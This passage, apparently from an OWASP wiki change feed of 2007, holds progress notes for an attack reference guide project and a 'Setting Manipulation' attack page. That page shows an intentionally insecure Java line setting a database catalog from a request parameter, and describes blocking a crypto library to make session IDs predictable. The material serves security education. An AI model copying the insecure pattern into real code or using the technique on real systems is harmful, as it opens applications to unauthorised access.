** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=23056&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=23057&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=23058&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=23060&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=23065&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;diff=23117&amp;amp;oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;diff=23118&amp;amp;oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=23067&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=23075&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=23077&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=23079&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=23082&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=23084&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=23059&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=23066&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=23071&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=23076&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=23078&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=23081&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=23086&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=23088&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=23089&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=23090&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;diff=23119&amp;amp;oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=23109&amp;amp;oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=23093&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=23094&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=23104&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''New items'''&lt;br /&gt;
** [[Denial_of_Service]]&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Injection_Attack&amp;diff=23123</id>
		<title>Category:Injection Attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Injection_Attack&amp;diff=23123"/>
				<updated>2007-11-05T19:59:29Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: Removing all content from page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Denial_of_Service_Attack&amp;diff=23122</id>
		<title>Category:Denial of Service Attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Denial_of_Service_Attack&amp;diff=23122"/>
				<updated>2007-11-05T19:56:40Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
==How to test?==&lt;br /&gt;
&lt;br /&gt;
[[Testing for application layer Denial of Service (DoS) attacks]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Setting_Manipulation&amp;diff=23121</id>
		<title>Setting Manipulation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Setting_Manipulation&amp;diff=23121"/>
				<updated>2007-11-05T19:47:31Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Related Vulnerabilities */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
This attack aims to modify application settings in order to cause data misleading or advantages on user behalf. He may manipulate values in the system and manages specific resources user by application or affects its functionalities.&lt;br /&gt;
&lt;br /&gt;
An attacker can exploit several functionalities of the application using this attack technique, but it would not possible to describe all the ways of exploration, due to innumerable options that attacker may use to control the system values.   &lt;br /&gt;
&lt;br /&gt;
Using this attack technique, it is possible to manipulate settings by changing the application functions, such as calls to the database, blocking access to external libraries and/or modification log files.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to Low&lt;br /&gt;
&lt;br /&gt;
==Example==&lt;br /&gt;
&lt;br /&gt;
===Example 1 ===&lt;br /&gt;
&lt;br /&gt;
An attacker needs to identify the variables without input validation or improperly encapsulated to obtain success in the attack.&lt;br /&gt;
&lt;br /&gt;
The following example was based on the ones found in the Individual CWE Dictionary Definition (Setting Manipulation-15). &lt;br /&gt;
&lt;br /&gt;
Consider the following piece of Java code:&lt;br /&gt;
  …&lt;br /&gt;
  conn.setCatalog(request.getParameter(“catalog”));&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
This fragment reads the string “catalog” from “HttpServletRequest” and sets it as the active catalog for a database connection. An attacker could manipulate this information and cause connection error or unauthorized access to other catalogs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2 – Block Access to Libraries ===&lt;br /&gt;
&lt;br /&gt;
The attacker has the privileges to block application access to external libraries to execute this attack. It is necessary discover what external libraries are accessed by application and block it. The attacker needs to observe if behavior of the system goes into an insecure/inconsistent state.&lt;br /&gt;
&lt;br /&gt;
In this case the application uses a third party cryptographic random number generation library that used in generation of user session ids. An attacker may block to access this library by renaming it.&lt;br /&gt;
Then an application will be use the weak pseudo random number generation library. The attacker can use this weakness to predict the session id user, he/she attempts to perform elevation of privilege escalation and gains access user’s account. &lt;br /&gt;
&lt;br /&gt;
For more details about this attack, see:&lt;br /&gt;
http://capec.mitre.org/data/definitions/96.html&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/15.html - Setting Manipulation&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/13.html - Subverting Environment Variable Values&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/96.html - Block Access to Libraries&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Denial of Service]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:General_Logic_Error_Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
*[[:Category: Error Handling]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23120</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23120"/>
				<updated>2007-11-05T19:39:43Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (60% of the project)&lt;br /&gt;
# Attacks categorization (20% of the project)&lt;br /&gt;
# Research and describe new attacks (20% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''100% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 90% Done ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''91'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''51 of 59 items done'''!&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* [[:Category:Protocol Manipulation]]&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 ===&lt;br /&gt;
Research and Description of new attacks(under revision):&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=23056&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=23057&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=23058&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=23060&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=23065&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;diff=23117&amp;amp;oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;diff=23118&amp;amp;oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=23067&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=23075&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=23077&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
